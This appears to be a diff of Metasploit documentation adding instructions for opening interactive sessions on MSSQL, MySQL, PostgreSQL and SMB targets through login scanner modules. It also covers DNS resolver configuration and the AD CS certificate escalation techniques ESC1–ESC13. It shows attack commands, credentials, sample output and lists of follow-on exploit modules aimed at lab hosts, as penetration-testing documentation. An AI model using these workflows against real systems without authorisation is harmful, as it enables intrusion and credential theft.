+how iptables rules can be added to and removed from a specific chain.
+
+### The Black Hole Resolver
+The black hole resolver can be used to prevent queries from being resolved. It handles all query types and will prevent
+resolvers defined after it from being used. The black hole resolver is specified by using the `black-hole` keyword.
+
+### The Upstream Resolver
+An upstream resolver can be used by specifying either an IPv4 or IPv6 address. When Metasploit uses this resolver, the
+defined host will be contacted over the network. A session can optionally be defined through which network traffic will
+be sent.
+
+### The System Resolver
+The system resolver can be used for hostname resolution to either IPv4 or IPv6 addresses by invoking the host operating
+system's API. This is particularly useful in cases where the system's API is expected to be hooked by an external entity
+such as proxychains. The system resolver is specified by using the `system` keyword. Queries that can not be fulfilled
+by simply translating the query name to an IP address (e.g. PTR, TXT and SRV queries) will use the next resolver that is
+configured in the rule.
+
+### The Static Resolver
+The static resolver can be used for hostname resolution to either IPv4 or IPv6 addresses through a static mapping that
+is configured within Metasploit. This functionality is analogous to the `hosts` file found on many systems which defines
+static hostname to IP address associations. The static resolver is specified by using the `static` keyword. Queries that
+can not be fulfilled by simply translating the query name to an IP address (e.g. PTR, TXT and SRV queries) will use the
+next resolver that is configured in the rule.
+
+See [Static DNS Entries](#static-dns-entries) for configuring static entries.
+
+### Example Rules
+
+Define a single rule in the first position to handle all queries through three resolvers, first checking if there is a
+static entry in Metasploit then using the system resolver and finally specifying an upstream DNS server to handle any
+other query type.
+
+```
+dns add --index 1 --rule * static system 192.0.2.1
+```
+
+Append a rule to the end that will handle all queries for `*.lab.lan` using an upstream server contacted through session
+1.
+
+```
+dns add --rule *.lab.lan --session 1 192.0.2.1
+```
+
+Append a rule to drop all queries for `*.noresolve.lan` using the black hole resolver.
+
+```
+dns add --rule *.noresolve.lan black-hole
+```
+
+## Static DNS Entries
+Static entries used by the static resolver are configured through the `add-static` and `remove-static` subcommands. The
+currently configured entries can be viewed in the `dns print` output and all entries can be flushed with the
+`flush-static` subcommand. Static entries that are configured are shared across *all* rules in which a static resolver
+is specified. In order for the static entry to be used, at least one rule must match the hostname, and that rule must be
+configured to use the static resolver. A single hostname can be associated with multiple IP addresses and the same IP
+address can be associated with multiple hostnames.
+
+### Example Static Entries
+
+Define static entries for `localhost` and common variations.
+
+```
+dns add-static localhost  127.0.0.1 ::1
+dns add-static localhost4 127.0.0.1
+dns add-static localhost6 ::1
+```
+
+Remove all static entries for `localhost`.
+
+```
+dns remove-static localhost
+```
+
+Remove all static entries.
+
+```
+dns flush-static
+```
+
+## The DNS Cache
+DNS query replies are cached internally by Metasploit based on their TTL. This intends to minimize the amount of network
+traffic required to perform the necessary lookups. The number of query replies that are currently cached is available in
+the `dns print` output and all replies can be flushed with the `flush-cache` subcommand.
+
+## Configuration Management
+The DNS configuration can be saved using the `save` command from the `msfconsole` command context. Once saved, the
+settings will be automatically restored the next time Metasploit starts up. Any changes that are made at runtime will be
+lost when Metasploit exits, unless the `save` command is used.
+
+### Resetting the Configuration
+The DNS configuration can be restored to the default state by using the `reset-config` subcommand. The default
+configuration:
+
+* Populates the static entries from the host operating system's `hosts` file
+* Defines a single rule that matches all query names whose first resolver is the `static` resolver and the remaining
+  resolvers are set from the host operating systems' resolv.conf file
+
+## Resolving hostnames
+The `resolve` subcommand can be used to resolve a hostname to either an IPv4 or IPv6 address. In doing so, the rule that
+was used to define the resolvers will be printed allowing the wildcard matching logic to be tested.
@@ -29,7 +29,7 @@ All of the above features can also be logically separated within workspaces. By

 ## Using msfdb

-Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run `./msfdb init`.
+Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run `./msfdb init`
 ```
 Creating database at /Users/your_current_account_name/.msf4/db
 Starting database at /Users/your_current_account_name/.msf4/db...success
@@ -39,9 +39,14 @@ Starting database at /Users/your_current_account_name/.msf4/db...success
 Creating initial database schema
 ```

-This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information.
+This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information.  If you start up msfconsole now it should automatically connect to the database, and if you run `db_status` you should see something like this:

-msfdb then needs to establish the credentials that are used in the Web Service. The Web Service is how Metasploit connects to the database we have just created. The first prompt asks you what username you want to use to connect to the database.
+```
+msf6 > db_status
+[*] Connected to msf. Connection type: postgresql.
+```
+
+You can also setup a Web Service, which Metasploit can use to connect to the database you have just created.  Msfdb needs to establish the credentials that are used in the Web Service. If you run `msfdb --component webservice init` the first prompt asks you what username you want to use to connect to the database:

 ```
 [?] Initial MSF web service account username? [your_current_account_name]:
@@ -3,11 +3,23 @@
 Microsoft SQL Server (MSSQL) is a relational database management system. Commonly used in conjunction with web applications
 and other software that need to persist data. MSSQL is a useful target for data extraction and code execution.

-MySQL is frequently found on port on the following ports:
+MSSQL is frequently found on port on the following ports:

 - 1433/TCP
 - 1434/UDP

+For a full list of MSSQL modules run the `search` command within msfconsole:
+
+```msf
+msf6 > search mssql
+```
+
+Or to search for modules that work with a specific session type:
+
+```msf
+msf6 > search session_type:mssql
+```
+
 ### Lab Environment

 Environment setup:
@@ -26,6 +38,176 @@ use auxiliary/admin/mssql/mssql_sql
 run rhost=192.168.123.13 username=administrator password=p4$$w0rd sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
 ```

+### Logging in and obtaining a session
+To log in or obtain an interactive session on an MSSQL instance running on the target, use mssql_login
+
+```msf
+use auxiliary/scanner/mssql_login
+run CreateSession=true RPORT=1433 RHOSTS=192.168.2.242 USERNAME=user PASSWORD=password
+```
+
+The CreateSession option, when set to true, will result in returning an interactive MSSQL session with the target machine
+on a successful login:
+
+```msf
+[*] 192.168.2.242:1433    - 192.168.2.242:1433 - MSSQL - Starting authentication scanner.
+[!] 192.168.2.242:1433    - No active DB -- Credential data will not be saved!
+[+] 192.168.2.242:1433    - 192.168.2.242:1433 - Login Successful: WORKSTATION\user:password
+[*] MSSQL session 1 opened (192.168.2.1:60963 -> 192.168.2.242:1433) at 2024-03-15 13:41:31 -0500
+[*] 192.168.2.242:1433    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Which you can interact with using `sessions -i <session id>` or `sessions -i -1` to interact with the most recently opened session.
+
+```msf
+msf6 auxiliary(scanner/mssql/mssql_login) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type   Information                      Connection
+  --  ----  ----   -----------                      ----------
+  1         mssql  MSSQL test @ 192.168.2.242:1433  192.168.2.1:60963 -> 192.168.23.242:1433 (192.168.2.242)
+
+msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i 1
+[*] Starting interaction with 1...
+
+mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
+Response
+========
+
+    #  NULL
+    -  ----
+    0  Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
+	    Oct 8 2022 05:58:25
+	    Copyright (C) 2022 Microsoft Corporation
+	    Developer Edition (64-bit) on Windows Server 2022 Stand
+       ard 10.0 <X64> (Build 20348: ) (Hypervisor)
+```
+
+When interacting with a session, the help command can be useful:
+
+```msf
+mssql @ 192.168.2.242:1433 (master) > help
+
+Core Commands
+=============
+
+    Command            Description
+    -------            -----------
+    ?                  Help menu
+    background         Backgrounds the current session
+    bg                 Alias for background
+    exit               Terminate the PostgreSQL session
+    help               Help menu
+    irb                Open an interactive Ruby shell on the current session
+    pry                Open the Pry debugger on the current session
+    sessions           Quickly switch to another session
+
+
+MSSQL Client Commands
+=====================
+
+    Command            Description
+    -------            -----------
+    query              Run a single SQL query
+    query_interactive  Enter an interactive prompt for running multiple SQL queries
+
+
+Local File System Commands
+==========================
+
+    Command            Description
+    -------            -----------
+    getlwd             Print local working directory (alias for lpwd)
+    lcat               Read the contents of a local file to the screen
+    lcd                Change local working directory
+    ldir               List local files (alias for lls)
+    lls                List local files
+    lmkdir             Create new directory on local machine
+    lpwd               Print local working directory
+
+This session also works with the following modules:
+
+  auxiliary/admin/mssql/mssql_enum
+  auxiliary/admin/mssql/mssql_escalate_dbowner
+  auxiliary/admin/mssql/mssql_escalate_execute_as
+  auxiliary/admin/mssql/mssql_exec
+  auxiliary/admin/mssql/mssql_findandsampledata
+  auxiliary/admin/mssql/mssql_idf
+  auxiliary/admin/mssql/mssql_sql
+  auxiliary/admin/mssql/mssql_sql_file
+  auxiliary/scanner/mssql/mssql_hashdump
+  auxiliary/scanner/mssql/mssql_schemadump
+  exploit/windows/mssql/mssql_payload
+```
+
+To interact directly with the session as if in a SQL prompt, you can use the `query` command.
+
+```msf
+msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i -1
+[*] Starting interaction with 2...
+
+mssql @ 192.168.2.242:1433 (master) > query -h
+Usage: query
+
+Run a single SQL query on the target.
+
+OPTIONS:
+
+    -h, --help      Help menu.
+    -i, --interact  Enter an interactive prompt for running multiple SQL queries
+
+Examples:
+
+    query select @@version;
+    query select user_name();
+    query select name from master.dbo.sysdatabases;
+
+mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
+Response
+========
+
+    #  NULL
+    -  ----
+    0  Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
+	Oct  8 2022 05:58:25
+	Copyright (C) 2022 Microsoft Corporation
+	Developer Edition (64-bit) on Windows Server 2022 Standard 10.0 <X64> (B
+       uild 20348: ) (Hypervisor)
+```
+
+Alternatively you can enter a SQL prompt via the `query_interactive` command which supports multiline commands:
+
+```msf
+mssql @ 192.168.2.242:1433 (master) > query_interactive -h
+Usage: query_interactive
+
+Go into an interactive SQL shell where SQL queries can be executed.
+To exit, type 'exit', 'quit', 'end' or 'stop'.
+
+mssql @ 192.168.2.242:1433 (master) > query_interactive
+[*] Starting interactive SQL shell for mssql @ 192.168.2.242:1433 (master)
+[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
+
+SQL >> select *
+SQL *> from information_schema.tables
+SQL *> where table_type = 'BASE TABLE';
+[*] Executing query: select * from information_schema.tables where table_type = 'BASE TABLE';
+Response
+========
+    #  TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME             TABLE_TYPE
+    -  -------------  ------------  ----------             ----------
+    0  master         dbo           spt_fallback_db        BASE TABLE
+    1  master         dbo           spt_fallback_dev       BASE TABLE
+    2  master         dbo           spt_fallback_usg       BASE TABLE
+    4  master         dbo           Users                  BASE TABLE
+    5  master         dbo           spt_monitor            BASE TABLE
+    6  master         dbo           MSreplication_options  BASE TABLE
+SQL >>
+```
+
 ### Link crawling

 Identify if the SQL server has been configured with trusted links, which allows running queries on other MSSQL instances:
@@ -17,6 +17,12 @@ There are more modules than listed here, for the full list of modules run the `s
 msf6 > search mysql
 ```

+Or to search for modules that work with a specific session type:
+
+```msf
+msf6 > search session_type:mysql
+```
+
 ### Lab Environment

 When testing in a lab environment MySQL can either be installed on the host machine or within Docker:
@@ -79,6 +85,158 @@ run cidr:/24:mysql://user:pass@192.168.222.0 threads=50
 run cidr:/24:mysql://user@192.168.222.0 threads=50 pass_file=./wordlist.txt
 ```

+### Obtaining an Interactive Session on the Target
+
+The CreateSession option in `auxiliary/scanner/mysql/msql_login` allows you to obtain an interactive session
+for the MySQL client you're connecting to. The run command with CreateSession
+set to true should give you an interactive session:
+
+```msf
+msf6 > use scanner/mysql/mysql_login 
+msf6 auxiliary(scanner/mysql/mysql_login) > run rhost=127.0.0.1 rport=4306 username=root password=password createsession=true
+
+[+] 127.0.0.1:4306        - 127.0.0.1:4306 - Found remote MySQL version 11.2.2
+[+] 127.0.0.1:4306        - 127.0.0.1:4306 - Success: 'root:password'
+[*] MySQL session 1 opened (127.0.0.1:53241 -> 127.0.0.1:4306) at 2024-03-12 12:40:46 -0500
+[*] 127.0.0.1:4306        - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/mysql/mysql_login) > sessions -i -1
+[*] Starting interaction with 1...
+
+mysql @ 127.0.0.1:4306 >
+```
+
+You can interact with your new session using `sessions -i -1` or `sessions <session id>`.
+You can also use `help` to get more information about how to use your session.
+
+```msf
+msf6 auxiliary(scanner/mysql/mysql_login) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type   Information                      Connection
+  --  ----  ----   -----------                      ----------
+  2         mssql  MSSQL test @ 192.168.2.242:1433  192.168.2.1:61428 -> 192.168.2.242:1433 (192.168.2.242)
+  3         mysql  MySQL root @ 127.0.0.1:4306      127.0.0.1:61450 -> 127.0.0.1:4306 (127.0.0.1)
+
+msf6 auxiliary(scanner/mysql/mysql_login) > sessions -i 3
+[*] Starting interaction with 3...
+```
+
+When interacting with a session, the help command can be useful:
+
+```msf
+mysql @ 127.0.0.1:4306 > help
+
+Core Commands
+=============
+
+    Command            Description
+    -------            -----------
+    ?                  Help menu
+    background         Backgrounds the current session
+    bg                 Alias for background
+    exit               Terminate the PostgreSQL session
+    help               Help menu
+    irb                Open an interactive Ruby shell on the current session
+    pry                Open the Pry debugger on the current session
+    sessions           Quickly switch to another session
+
+
+MySQL Client Commands
+=====================
+
+    Command            Description
+    -------            -----------
+    query              Run a single SQL query
+    query_interactive  Enter an interactive prompt for running multiple SQL queries
+
+
+Local File System Commands
+==========================
+
+    Command            Description
+    -------            -----------
+    getlwd             Print local working directory (alias for lpwd)
+    lcat               Read the contents of a local file to the screen
+    lcd                Change local working directory
+    ldir               List local files (alias for lls)
+    lls                List local files
+    lmkdir             Create new directory on local machine
+    lpwd               Print local working directory
+
+This session also works with the following modules:
+
+  auxiliary/admin/mysql/mysql_enum
+  auxiliary/admin/mysql/mysql_sql
+  auxiliary/scanner/mysql/mysql_file_enum
+  auxiliary/scanner/mysql/mysql_hashdump
+  auxiliary/scanner/mysql/mysql_schemadump
+  auxiliary/scanner/mysql/mysql_version
+  auxiliary/scanner/mysql/mysql_writable_dirs
+  exploit/multi/mysql/mysql_udf_payload
+  exploit/windows/mysql/mysql_mof
+  exploit/windows/mysql/mysql_start_up
+```
+
+Once you've done that, you can run any MySQL query against the target using the `query` command:
+
+```msf
+mysql @ 127.0.0.1:4306 > query -h
+Usage: query
+
+Run a single SQL query on the target.
+
+OPTIONS:
+
+    -h, --help      Help menu.
+    -i, --interact  Enter an interactive prompt for running multiple SQL queries
+
+Examples:
+
+    query SHOW DATABASES;
+    query USE information_schema;
+    query SELECT * FROM SQL_FUNCTIONS;
+    query SELECT version();
+
+mysql @ 127.0.0.1:4306 > query 'SELECT version();'
+Response
+========
+
+    #  version()
+    -  ---------
+    0  11.2.2-MariaDB-1:11.2.2+maria~ubu2204
+```
+
+Alternatively you can enter a SQL prompt via the `query_interactive` command which supports multiline commands:
+
+```msf
+mysql @ 127.0.0.1:4306 () > query_interactive -h
+Usage: query_interactive
+
+Go into an interactive SQL shell where SQL queries can be executed.
+To exit, type 'exit', 'quit', 'end' or 'stop'.
+
+mysql @ 127.0.0.1:4306 () > query_interactive
+[*] Starting interactive SQL shell for mysql @ 127.0.0.1:4306 ()
+[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
+
+SQL >> SELECT table_name
+SQL *> FROM information_schema.tables
+SQL *> LIMIT 2;
+[*] Executing query: SELECT table_name FROM information_schema.tables LIMIT 2;
+Response
+========
+
+    #  table_name
+    -  ----------
+    0  ALL_PLUGINS
+    1  APPLICABLE_ROLES
+
+SQL >>
+```
+
 ### MySQL Dumping

 User and hash dump:
@@ -17,6 +17,13 @@ There are more modules than listed here, for the full list of modules run the `s
 msf6 > search postgres
 ```

+Or to search for modules that work with a specific session type:
+
+```msf
+msf6 > search session_type:postgres
+```
+
+
 ### Lab Environment

 When testing in a lab environment PostgreSQL can either be installed on the host machine or within Docker:
@@ -80,6 +87,158 @@ run cidr:/24:postgres://user:pass@192.168.222.0 threads=50
 run cidr:/24:postgres://user@192.168.222.0 threads=50 pass_file=./wordlist.txt
 ```

+### Obtaining an Interactive Session
+The CreateSession option for `auxiliary/scanner/postgres/postgres_login` allows you to obtain an
+interactive session for the Postgres client you're connecting to. The run command with CreateSession
+set to true should give you an interactive session.
+
+For example:
+
+```msf
+msf6 auxiliary(scanner/postgres/postgres_login) > run rhost=127.0.0.1 rport=5432 username=postgres password=password database=template1 createsession=true
+```
+
+Should yield:
+
+```msf
+[+] 127.0.0.1:5432 - Login Successful: postgres:password@template1
+[*] PostgreSQL session 1 opened (127.0.0.1:61324 -> 127.0.0.1:5432) at 2024-03-15 14:00:12 -0500
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+You can interact with your session using `sessions -i -1` or `sessions <session id>`.
+Use the help command for more info.
+
+```msf
+msf6 auxiliary(scanner/postgres/postgres_login) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type        Information                           Connection
+  --  ----  ----        -----------                           ----------
+  1         postgresql  PostgreSQL postgres @ 127.0.0.1:5432  127.0.0.1:61324 -> 127.0.0.1:5432 (127.0.0.1)
+
+msf6 auxiliary(scanner/postgres/postgres_login) > sessions -i 1
+[*] Starting interaction with 1...
+```
+
+When interacting with a session, the help command can be useful:
+
+```msf
+postgresql @ 127.0.0.1:5432 (template1) > help
+
+Core Commands
+=============
+
+    Command            Description
+    -------            -----------
+    ?                  Help menu
+    background         Backgrounds the current session
+    bg                 Alias for background
+    exit               Terminate the PostgreSQL session
+    help               Help menu
+    irb                Open an interactive Ruby shell on the current session
+    pry                Open the Pry debugger on the current session
+    sessions           Quickly switch to another session
+
+
+PostgreSQL Client Commands
+==========================
+
+    Command            Description
+    -------            -----------
+    query              Run a single SQL query
+    query_interactive  Enter an interactive prompt for running multiple SQL queries
+
+
+Local File System Commands
+==========================
+
+    Command            Description
+    -------            -----------
+    getlwd             Print local working directory (alias for lpwd)
+    lcat               Read the contents of a local file to the screen
+    lcd                Change local working directory
+    ldir               List local files (alias for lls)
+    lls                List local files
+    lmkdir             Create new directory on local machine
+    lpwd               Print local working directory
+
+This session also works with the following modules:
+
+  auxiliary/admin/postgres/postgres_readfile
+  auxiliary/admin/postgres/postgres_sql
+  auxiliary/scanner/postgres/postgres_hashdump
+  auxiliary/scanner/postgres/postgres_schemadump
+  auxiliary/scanner/postgres/postgres_version
+  exploit/linux/postgres/postgres_payload
+  exploit/multi/postgres/postgres_copy_from_program_cmd_exec
+  exploit/multi/postgres/postgres_createlang
+  exploit/windows/postgres/postgres_payload
+```
+
+Once you've done that, you can run any Postgres query against the target using the `query` command:
+
+```msf
+postgresql @ 127.0.0.1:5432 (template1) > query -h
+Usage: query
+
+Run a single SQL query on the target.
+
+OPTIONS:
+
+    -h, --help      Help menu.
+    -i, --interact  Enter an interactive prompt for running multiple SQL queries
+
+Examples:
+
+    query SELECT user;
+    query SELECT version();
+    query SELECT * FROM pg_catalog.pg_tables;
+
+postgresql @ 127.0.0.1:5432 (template1) > query 'SELECT version();'
+[*] SELECT 1
+
+Response
+========
+
+    #  version
+    -  -------
+    0  PostgreSQL 14.1 on aarch64-apple-darwin20.6.0, compiled by Apple clang version 12.0.5 (clang-1205.0.22.9), 64-bit
+```
+
+Alternatively you can enter a SQL prompt via the `query_interactive` command which supports multiline commands:
+
+```msf
+postgresql @ 127.0.0.1:5432 (template1) > query_interactive -h
+Usage: query_interactive
+
+Go into an interactive SQL shell where SQL queries can be executed.
+To exit, type 'exit', 'quit', 'end' or 'stop'.
+
+postgresql @ 127.0.0.1:5432 (template1) > query_interactive
+[*] Starting interactive SQL shell for postgresql @ 127.0.0.1:5432 (template1)
+[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
+
+SQL >> SELECT table_name
+SQL *>   FROM information_schema.tables
+SQL *>  LIMIT 2;
+[*] Executing query: SELECT table_name FROM information_schema.tables LIMIT 2;
+[*] SELECT 2
+
+Response
+========
+
+    #  table_name
+    -  ----------
+    0  pg_statistic
+    1  pg_type
+
+SQL >>
+```
+
 ### PostgreSQL Capture Server

 Captures and log PostgreSQL credentials:
@@ -27,6 +27,12 @@ There are more modules than listed here, for the full list of modules run the `s
 msf6 > search smb
 ```

+Or to search for modules that work with a specific session type:
+
+```msf
+msf6 > search session_type:smb
+```
+
 ### Lab Environment

 When testing in a lab environment - SMB can be used on a Window's host machine, or within Docker.
@@ -63,6 +69,122 @@ Restart the service:
 service smbd restart
 ```

+### SMB Login and Interactive Sessions
+
+When using the smb_login module, the CreateSession option can be used to obtain an interactive
+session within the smb instance. Running with the following options:
+
+```msf
+msf6 auxiliary(scanner/smb/smb_login) > run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username
+```
+
+Should give you output similar to 
+
+```msf
+[*] 172.14.2.164:445    - 172.14.2.164:445 - Starting SMB login bruteforce
+[+] 172.14.2.164:445    - 172.14.2.164:445 - Success: 'windomain.local\username:password' Administrator
+[*] SMB session 1 opened (172.16.158.1:62793 -> 172.14.2.164:445) at 2024-03-12 17:03:09 +0000
+[*] 172.14.2.164:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
+[*] Starting interaction with 1...
+```
+
+Which you can interact with using `sessions -i <session id>` or `sessions -i -1` to interact with the most recently opened session.
+
+```msf
+msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
+[*] Starting interaction with 1...
+
+SMB (172.14.2.164) > shares
+Shares
+======
+
+    #  Name    Type          comment
+    -  ----    ----          -------
+    0  ADMIN$  DISK|SPECIAL  Remote Admin
+    1  C$      DISK|SPECIAL  Default share
+    2  foo     DISK
+    3  IPC$    IPC|SPECIAL   Remote IPC
+
+SMB (172.14.2.164) > shares -i foo
+[+] Successfully connected to foo
+SMB (172.14.2.164\foo) > ls
+ls
+===
+[truncated]
+```
+
+When interacting with a session, the help command can be useful:
+
+```msf
+SMB (172.14.2.164\foo) > help
+
+Core Commands
+=============
+
+    Command       Description
+    -------       -----------
+    ?             Help menu
+    background    Backgrounds the current session
+    bg            Alias for background
+    exit          Terminate the SMB session
+    help          Help menu
+    irb           Open an interactive Ruby shell on the current session
+    pry           Open the Pry debugger on the current session
+    sessions      Quickly switch to another session
+
+
+Shares Commands
+===============
+
+    Command       Description
+    -------       -----------
+    cat           Read the file at the given path
+    cd            Change the current remote working directory
+    delete        Delete a file
+    dir           List all files in the current directory (alias for ls)
+    download      Download a file
+    ls            List all files in the current directory
+    mkdir         Make a new directory
+    pwd           Print the current remote working directory
+    rmdir         Delete a directory
+    shares        View the available shares and interact with one
+    upload        Upload a file
+
+
+Local File System Commands
+==========================
+
+    Command       Description
+    -------       -----------
+    getlwd        Print local working directory (alias for lpwd)
+    lcat          Read the contents of a local file to the screen
+    lcd           Change local working directory
+    ldir          List local files (alias for lls)
+    lls           List local files
+    lmkdir        Create new directory on local machine
+    lpwd          Print local working directory
+
+This session also works with the following modules:
+
+  auxiliary/admin/dcerpc/icpr_cert
+  auxiliary/admin/dcerpc/samr_computer
+  auxiliary/admin/smb/delete_file
+  auxiliary/admin/smb/download_file
+  auxiliary/admin/smb/psexec_ntdsgrab
+  auxiliary/admin/smb/upload_file
+  auxiliary/gather/windows_secrets_dump
+  auxiliary/scanner/smb/pipe_auditor
+  auxiliary/scanner/smb/pipe_dcerpc_auditor
+  auxiliary/scanner/smb/smb_enum_gpp
+  auxiliary/scanner/smb/smb_enumshares
+  auxiliary/scanner/smb/smb_enumusers
+  auxiliary/scanner/smb/smb_enumusers_domain
+  auxiliary/scanner/smb/smb_lookupsid
+  exploit/windows/smb/psexec
+```
+
 ### SMB Enumeration

 Enumerate SMB version:
@@ -5,18 +5,39 @@ for testing purposes.
 # Introduction to AD CS Vulnerabilities
 ```mermaid
 flowchart TD
-	escexp[Find vulnerable certificate templates\nvia ldap_esc_vulnerable_cert_finder] --> icpr[Issue certificates via icpr_cert]
-	icpr[Issue certificates via icpr_cert] --> ESC1{{ESC1}}
-	ESC1{{ESC1}} -- Via PKINIT --> pkinit{Authenticate to Kerberos}
-	icpr[Issue certificates via icpr_cert] --> users[Request certificates on behalf of other users]
-	users[Request certificates on behalf of other users] --> ESC2{{ESC2}}
-	users[Request certificates on behalf of other users] --> ESC3{{ESC3}}
-	ESC2{{ESC2}} -- Via PKINIT --> pkinit[Authenticate to Kerberos]
-	ESC3{{ESC3}} -- Via PKINIT --> pkinit[Authenticate to Kerberos]
-	ad_cs_template[Reconfigure certificates via ad_cs_cert_template] -- Exploit configuration --> icpr
+    subgraph ad_cs_cert_templates[<b>ad_cs_cert_templates</b>]
+        ESC4(ESC4)
+        update_template[<i>Update Template</i>]
+        ESC4 --> update_template
+    end
+    subgraph icpr_cert[<b>icpr_cert</b>]
+        ESC1(ESC1)
+        ESC2(ESC2)
+        ESC3(ESC3)
+        ESC13(ESC13)
+        alt_subject[<i>Alternate Subject Issuance</i>]
+        as_eagent[<i>Enrollment Agent Issuance</i>]
+        normal[<i>Normal Issuance</i>]
+
+        ESC1 --> alt_subject
+        ESC2 --> as_eagent
+        ESC3 --> as_eagent
+        ESC13 --> normal
+        as_eagent -- use new certificate --> normal
+    end
+    subgraph kerberos/get_ticket[<b>kerberos/get_ticket</b>]
+        PKINIT[<i>PKINIT</i>]
+    end
+    subgraph ldap_esc_vulnerable_cert_finder[<b>ldap_ecs_vulnerable_cert_finder</b>]
+        find_vulnerable_templates[<i>Find Vulnerable Templates</i>]
+    end
+    alt_subject --> PKINIT
+    find_vulnerable_templates --> icpr_cert
+    normal --> PKINIT
+    update_template --> ESC1
 ```

-The chart above showcases how one can go about attacking four common AD CS
+The chart above showcases how one can go about attacking five unique AD CS
 vulnerabilities, taking advantage of various flaws in how certificate templates are
 configured on an Active Directory Certificate Server.

@@ -30,8 +51,7 @@ administrator via Kerberos.
 Each certificate template vulnerability that will be discussed here has a ESC code, such
 as ESC1, ESC2. These ESC codes are taken from the original whitepaper that
 SpecterOps published which popularized these certificate template attacks, known as
-[Certified
-Pre-Owned](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf).
+[Certified Pre-Owned](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf).
 In this paper Will Schroeder and Lee Christensen described 8 different domain escalation
 attacks that they found they could conduct via misconfigured certificate templates:

@@ -52,29 +72,30 @@ attacks that they found they could conduct via misconfigured certificate templat
 - ESC7 - Vulnerable Certificate Authority Access Control
 - ESC8 - NTLM Relay to AD CS HTTP Endpoints

-Later, another
-[blog](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
-came out from Oliver Lyak which discovered ESC9 and ESC10, two more vulnerabilities that
-could allow normal domain joined users to abuse certificate template misconfigurations to
-gain domain administrator privileges.
+Later, additional techniques were disclosed by security researchers:

- ESC9 - No Security Extension - CT_FLAG_NO_SECURITY_EXTENSION flag set in
-  `msPKI-EnrollmentFlag`. Also `StrongCertificateBindingEnforcement` not set to 2 or
-  `CertificateMappingMethods` contains `UPN` flag.
- ESC10 - Weak Certificate Mappings -
-  `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
-  CertificateMappingMethods` contains `UPN` bit aka `0x4` or
-  `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc StrongCertificateBindingEnforcement` is set to `0`.
+- ESC9 - No Security Extension - CT_FLAG_NO_SECURITY_EXTENSION flag set in `msPKI-EnrollmentFlag`. Also
+  `StrongCertificateBindingEnforcement` not set to 2 or `CertificateMappingMethods` contains `UPN` flag.
+  - [Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and
+    more!](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
+- ESC10 - Weak Certificate Mappings - `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
+  CertificateMappingMethods` contains `UPN` bit aka `0x4` or `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
+  StrongCertificateBindingEnforcement` is set to `0`.
+  - [Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and
+    more!](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
+- ESC11 - Relaying NTLM to ICPR - Relaying NTLM authentication to unprotected RPC interface is allowed due to lack of
+  the `IF_ENFORCEENCRYPTICERTREQUEST` flag on `Config.CA.Interface.Flags`.
+  - [Relaying to AD Certificate Services over
+    RPC](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
+- ESC12 - A user with shell access to a CA server using a YubiHSM2 hardware security module can access the CA's private
+  key.
+  - [Shell access to ADCS CA with YubiHSM](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm)
+- ESC13 - Domain escalation via issuance policies with group links.
+  - [ADCS ESC13 Abuse Technique](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53)
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc13]]

-Finally, we have ESC11, which was discovered by Compass Security and described in their
-[blog
-post](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/).
-
- ESC11 - Relaying NTLM to ICPR - Relaying NTLM authentication to unprotected RPC
-  interface is allowed due to lack of the `IF_ENFORCEENCRYPTICERTREQUEST` flag on `Config.CA.Interface.Flags`.
-
-Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, and ESC4. As such,
-this page only covers exploiting ESC1 to ESC4 at this time.
+Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4 and ESC13. As such,
+this page only covers exploiting ESC1 through ESC4 and ESC13 at this time.

 Before continuing, it should be noted that ESC1 is slightly different than ESC2 and ESC3
